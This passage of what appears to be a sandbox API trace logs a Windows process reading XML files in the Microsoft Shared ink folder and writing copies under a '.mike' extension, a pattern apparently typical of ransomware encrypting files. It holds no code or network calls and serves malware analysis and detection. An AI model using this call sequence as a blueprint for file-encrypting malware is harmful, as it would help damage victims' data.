lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll", lpFilePart=0x0) returned 0x49 [0043.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.871] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.873] GetFileType (hFile=0x264) returned 0x1 [0043.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.873] GetFileType (hFile=0x264) returned 0x1 [0043.873] CloseHandle (hObject=0x264) returned 1 [0043.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.874] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.874] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dd3c0 | out: lpFileInformation=0x21dd3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42)) returned 1 [0043.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dd6b0 | out: lpFileInformation=0x21dd6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42)) returned 1 [0043.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.875] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.875] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.876] GetFileType (hFile=0x264) returned 0x1 [0043.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.876] GetFileType (hFile=0x264) returned 0x1 [0043.876] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.876] WriteFile (in: hFile=0x264, lpBuffer=0x21de404*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21de404*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.877] CloseHandle (hObject=0x264) returned 1 [0043.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.877] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ddf48 | out: lpFileInformation=0x21ddf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42)) returned 1 [0043.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.878] GetFileType (hFile=0x264) returned 0x1 [0043.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.878] GetFileType (hFile=0x264) returned 0x1 [0043.878] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.878] ReadFile (in: hFile=0x264, lpBuffer=0x21df518, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21df518*, lpNumberOfBytesRead=0x2af0c8*=0xa42, lpOverlapped=0x0) returned 1 [0043.879] CloseHandle (hObject=0x264) returned 1 [0043.880] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.880] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.880] GetFileType (hFile=0x264) returned 0x1 [0043.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.880] GetFileType (hFile=0x264) returned 0x1 [0043.880] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.880] WriteFile (in: hFile=0x264, lpBuffer=0x21e6174*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21e6174*, lpNumberOfBytesWritten=0x2af0bc*=0xa50, lpOverlapped=0x0) returned 1 [0043.880] CloseHandle (hObject=0x264) returned 1 [0043.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.881] GetFileType (hFile=0x264) returned 0x1 [0043.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.881] GetFileType (hFile=0x264) returned 0x1 [0043.882] WriteFile (in: hFile=0x264, lpBuffer=0x21e9388*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21e9388*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.882] CloseHandle (hObject=0x264) returned 1 [0043.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.883] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe45b3a80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe45b3a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe45b3a80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc70)) returned 1 [0043.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.884] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21eaa38 | out: lpFileInformation=0x21eaa38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe45b3a80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe45b3a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe45b3a80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc70)) returned 1 [0043.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", dwFileAttributes=0x80) returned 0 [0043.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.885] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe45b3a80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe45b3a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe45b3a80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc70)) returned 1 [0043.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpFilePart=0x0) returned 0x3d [0043.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike", lpFilePart=0x0) returned 0x42 [0043.885] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.mike")) returned 1 [0043.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.931] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.932] GetFileType (hFile=0x264) returned 0x1 [0043.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.932] GetFileType (hFile=0x264) returned 0x1 [0043.932] CloseHandle (hObject=0x264) returned 1 [0043.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.932] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.932] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ec998 | out: lpFileInformation=0x21ec998*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14)) returned 1 [0043.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ecc88 | out: lpFileInformation=0x21ecc88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14)) returned 1 [0043.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.933] GetFullPathNameW (in: lpFileName="C:\\Program 